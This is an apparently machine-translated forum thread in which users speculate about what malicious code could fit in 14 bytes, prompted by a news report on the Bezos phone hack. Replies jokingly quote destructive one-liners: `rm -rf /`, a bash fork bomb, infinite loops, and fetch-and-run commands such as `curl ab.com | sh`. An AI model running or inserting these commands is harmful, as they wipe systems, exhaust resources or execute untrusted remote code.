Stud Sterkel
2020-01-23 08:22:43 UTC
我正在閱讀這篇《紐約時報》 (NYT)文章,該文章涉及傑夫·貝索斯(Jeff Bezos)的電話被盜。文章指出:
2018年5月的消息突然出現,其中包含無害的視頻文件以及14字節小的惡意代碼塊
14個字節中可能包含哪些惡意代碼?似乎沒有足夠的空間來容納《紐約時報》文章概述的邏輯。文章指出,收到消息後不久,電話就開始發送大量數據。
與預期的間諜代碼不完全相同……我曾經在我們大學池中可供學生使用的一台計算機上找到一個18字節的“ .com”可執行文件。不用考慮太多-所有帶入的磁盤等都必須進行病毒掃描-我執行了該文件.. lo,瞧瞧..它擦拭了系統驅動器c:....對於在那里工作的技術人員,幸運的是,沒有真正的數據丟失,因為這些數據全部在網絡共享上,但是重新安裝操作系統和應用程序花費了半個工作日
rm -rf /是8個字節,在某些情況下可能被認為是惡意的。
@8bittree`sudo rm -rf / \ n`正好是14(將\ n作為一個字節的Unix / Linux換行符,而不是DOS / Windows CR + LF組合)。
`:(){:|:&};:\ n`也有14個字符。
遺憾的是,它不是13個字節……本來應該是……不幸的。
@Michael刪除`\ n`,它是13。也是`while(true);`:12個字節。for(;;);`:8個字節。
我在看什麼@EricDuminil?
@VLAZ`while(true);`可以是`while(1> 0);`以保存字節。;)
@KevinCruijssen或某些語言中的`while(1)`,這會節省另外兩種語言。考慮一下我們可以用它編寫更多的惡意代碼!:D
@VLAZ我有Java背景並且每天都經常使用Codegolf SE,因此[[true]到`1> 0`提示“(https://codegolf.stackexchange.com/a/21704/52210)。但是您確實是對的,許多語言都使用“ 1”作為真實值,例如Python或C(尤其是代碼高爾夫挑戰,儘管“ while(1);”和“ for(;;);”都將是單字節-即[05AB1E]中的`[`(https://github.com/Adriandmen/05AB1E/wiki/Commands)。
@Evorlor它被稱為叉子炸彈
在我的系統上@MontyHarder,,sudo要求用戶鍵入密碼。
-1
怎麼樣:`wget http:// <縮短URL以進行充分利用>`
是的,它正好適合:4d 61 6c 69 63 69 6f 75 73 20 43 6f 64 65
我曾經一次用`while(1);`崩潰了整個網站(偶然)。該網站將在用戶提交的js服務器端執行。該網站關閉了一個星期。
-1
`curl ab.com | sh`是14個字符
Codegolf.SE將為他們感到驕傲。